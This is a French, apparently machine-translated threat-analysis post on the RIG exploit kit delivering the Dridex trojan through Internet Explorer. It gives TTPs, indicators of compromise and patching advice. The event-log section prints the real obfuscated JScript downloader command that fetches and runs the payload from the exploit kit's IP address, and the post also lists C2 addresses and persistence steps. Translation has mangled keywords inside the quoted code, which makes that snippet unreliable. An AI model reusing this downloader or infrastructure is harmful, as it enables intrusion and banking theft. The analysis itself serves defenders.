Les kits d’exploitation RIG exploitent Internet Explorer en fournissant le cheval de Troie Dridex

NRZ.Digital
0 0

Le RIG Exploit Kit (EK), découvert en 2014, est connu pour exploiter les vulnérabilités du navigateur Internet Explorer de Microsoft et des applications tierces telles que Java, Adobe Flash et Microsoft Silverlight. Les exploits de navigateur sont très rares de nos jours, cependant, en mars 2021, des chercheurs ont découvert que le Rig EK avait la capacité d’exploiter CVE-2021-26411 affectant Microsoft Internet Explorer.

Dridex est connu comme un cheval de Troie bancaire qui a la capacité de voler des informations d’identification bancaires et d’autres informations personnelles pour accéder aux dossiers financiers. Récemment, un chercheur @nao_sec a découvert que Dridex avait changé ses techniques d’infection basées sur l’hôte pour contourner la sécurité et les protections antivirus des fournisseurs.

OpenText recherche constamment comment les kits d’exploit et autres logiciels malveillants affectent et interagissent avec le point de terminaison pour les meilleures techniques de détection. Vous trouverez ci-dessous un exemple de la tactique, des techniques et des procédures (TTP) OpenText observées lors d’un récent exploit RIG et d’une infection par le cheval de Troie Dridex.

Chaîne d’infection initiale – rediriger vers le RIG EK :

Montré ci-dessus: Domaine malveillant utilisant HTTP 302 pour rediriger vers la page de destination RIG EK

Montré ci-dessus: Adresse IP et chaîne d’URI hébergeant le RIG EK avec code d’exploitation partiel

Montré ci-dessus: Iexplore.exe interagissant avec cmd.exe pour exécuter le script post-exploit

Montré ci-dessus: Cmd.exe exécutant la charge utile Dridex abandonnée dans le répertoire Temp local pour démarrer le cheval de Troie Dridex après l’exploit

Montré ci-dessus: Charge utile initiale de Dridex affichant les métadonnées binaires

Montré ci-dessus: La persistance est obtenue via la création d’un ensemble de tâches planifiées à exécuter au démarrage et toutes les 30 minutes.

Montré ci-dessus: Dridex utilise le détournement de DLL (Dynamic Link Library) et le creusement de processus qui déplacent les DLL malveillantes et les binaires Windows légitimes dans les répertoires Local Temp ou Roaming.

Montré ci-dessus: Dridex Trojan IP et certificat SSL vus pendant le processus de creusement du processus Windows spoolsv.exe

Tactiques, techniques et procédures (TTP) observées pendant l’infection :

  • Journaux d’événements Windows affichant les processus associés et la ligne de commande

Nom du processus parent C:Program Files (x86)Internet Exploreriexplore.exe

Ligne de commande cmd.exe /q /c cd /d « %tmp% » && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y =Q;y[“set”+”Proxy”](n);y.open(« GET »,k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/[“Wait”+”ForResponse”]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=Chaîne,q=[],b=0;256^>b;b++)c[b]=b;pour(b=0;256^>b;b++)l=l+c[b]+e[“cha”+”rCodeAt”](b%e.longueur)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^ 3.tMp && // stArt WSCRIPT B // E: JScript 3.tMp « hj4ZytE5dZgd » « http://45.138.26.82/?MzkyNDk4&okTsKzUug&oa1n4=x33QcvWYaRuPCYjEM_jdSqRGPkzVGViIxo&s2ht4=2fn7DSHp2meCij07CeEAL3sF6WSR7V6vd- Ke1Tfwe0jiqDOQE4n9leTF5T8_GqzkLlyhKYhZOF-RaJYglH-5aRR7Vv3A72m7VFdMkjlRLU7WVTy-lJUVoT6Q4RmKnIEKWbrkJzB0FnVQvKKJojpUjGZGySLwjN » NouveauNomProcessus C:WindowsSysWOW64cmd.exe

Nom du processus parent C:WindowsSysWOW64cmd.exe
Ligne de commande WSCRIPT // B // E: JScript 3.tMp « hj4ZytE5dZgd » « http://45.138.26.82/?MzkyNDk4&okTsKzUug&oa1n4=x33QcvWYaRuPCYjEM_jdSqRGPkzVGViIxo&s2ht4=2fn7DSHp2meCij07CeEAL3sF6WSR7V6vd-Ke1Tfwe0jiqDOQE4n9leTF5T8_GqzkLlyhKYhZOF-RaJYglH-5aRR7Vv3A72m7VFdMkjlRLU7WVTy-lJUVoT6Q4RmKnIEKWbrkJzB0FnVQvKKJojpUjGVyTYMjJwgfSLQ2Z22-3N8sc&kUTwcVNTgyNQ== » « 2 » » NouveauNomProcessus C:WindowsSysWOW64wscript.exe

Nom du processus parent C:WindowsSysWOW64wscript.exe
Ligne de commande « C:WindowsSystem32cmd.exe » /c y0xyn.exe
NouveauNomProcessus C:WindowsSysWOW64cmd.exe

Nom du processus parent C:WindowsSysWOW64cmd.exe
Ligne de commande y0xyn.exe
NouveauNomProcessus C:UsersROBERT~1.TOMAppDataLocalTempy0xyn.exe

Nom du processus parent C:UsersROBERT~1.TOMAppDataLocalTempy0xyn.exe
Ligne de commande C:Windowssystem32schtasks.exe /run /tn « Xjewnuamckmuzcr »
NouveauNomProcessus C:WindowsSystem32schtasks.exe

  • Les binaires Windows observés ont été déplacés pendant le processus de piratage de DLL :

Processus parent : Explorer.exe

Chemin : C:Utilisateurs[REDACTED]AppDataLocalTdecmstp.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalythUtilman.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocal9sXuqoYcttune.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalsLDUDyowermgr.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalxIjxwZmsinfo32.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalHBzY3Lo4ddodiag.exe
Chemin : C:Utilisateurs[REDACTED]AppDataRoamingJhbyypvldvdupgrd.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalLCffUorStikyNot.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalAqPAr1p0bcastdvr.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalhyWpwjovSSysResetErr.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocal2eYtH4LockScreenContentServer.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocal9I16gAtBroker.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocaldlIR8aEB3phoneactivate.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalgHiasDxpserver.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalhpb1TE9wextract.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalw4eFILY3Xmsdt.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalqYd59E7vCameraSettingsUIHost.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalWWTLisoburn.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalAgNcSv4BTbcastdvr.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalWwQHiF3RdpSaUacHelper.exe
Chemin : C:Utilisateurs[REDACTED]AppDataLocalpTBOOrdpclip.exe

  • Processus évidement observé utilisé pour communiquer avec le Commandement et Contrôle (C2) :

    Processus parent :

    Explorer.exe
    Chemin de processus :
    C:Windowssystem32spoolsv.exe
    Traiter la ligne de commande :
    C:Windowssystem32spoolsv.exe

Processus parent : Explorer.exe
Chemin de processus :
C:WindowsSystem32svchost.exe
Traiter la ligne de commande :
C:WindowsSystem32svchost.exe (REMARQUE : NON -k dans la ligne de commande)

Indicateurs de compromis :

Gréement EK :
ankltrafficexit.xyz/trafficexit
– Rediriger le domaine vers la page de destination de Rig EK
45.138.26.82
– Plateforme d’hébergement IP EK

Adresses IP et ports associés au cheval de Troie Dridex C2 :
156.253.5.151 Port 443
136.243.194.22 Port 443
84.232.252.62 Port 443
77.201.73.52 Port 8443
51.195.18.83 Port 448
89.215.165.36 Port 8443
45.145.55.170 Port 443
164.155.66.30 Port 4143
205.185.113.183 Port 443
88.132.150.82 Port 443

Dridex Trojan binaire et hachage associé :
y0xyn.exe –
Binaire Dridex initial abandonné par Rig EK
Hachage SHA-256 :
e63628e1ea625d9363bd76e38a225fb78b4b70114ab97ee43b02b0fd68fc7176

Lien vers le binaire Dridex Trojan à des fins de validation.

Si les organisations craignent d’avoir été affectées par le Rig EK, OpenText recommanderait que les mesures suivantes soient prises:

  • Assurez-vous que les navigateurs et les plugins sont à jour et corrigés
  • Activer le mode protégé dans le navigateur Microsoft Internet Explorer

le Services de sécurité OpenText L’équipe utilise sa vaste expérience pour identifier les risques de sécurité d’une organisation et travailler avec elle pour protéger les systèmes, offrant de multiples services pour répondre aux objectifs de cybersécurité et de confidentialité. Contactez-nous pour plus d’informations.

Auteur : Lenny Conway, consultant principal


Happy
Happy
0
Sad
Sad
0
Excited
Excited
0
Sleepy
Sleepy
0
Angry
Angry
0
Surprise
Surprise
0

Average Rating

5 Star
0%
4 Star
0%
3 Star
0%
2 Star
0%
1 Star
0%

Laisser un commentaire

Next Post

Cardinal Financial embauche du travail à domicile dans de nombreux États !

Cardinal Financial embauche du travail à domicile dans les 50 États ! Cardinal Financial est une entreprise de plusieurs millions de dollars ! Cardinal Financial fournit une aide financière à des millions de personnes ! Cardinal Financial recherche du travail auprès de spécialistes en soutien à domicile! Nous participons au […]

Abonnez-vous maintenant